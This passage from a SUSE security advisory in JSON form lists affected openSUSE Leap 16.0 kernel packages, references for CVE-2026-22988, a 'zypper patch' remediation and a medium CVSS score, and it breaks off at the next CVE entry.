"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22988",
"url": "https://www.suse.com/security/cve/CVE-2026-22988"
},
{
"category": "external",
"summary": "SUSE Bug 1257282 for CVE-2026-22988",
"url": "https://bugzilla.suse.com/1257282"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-22988"
},
{
"cve": "CVE-2026-22989",
"ids": [
{
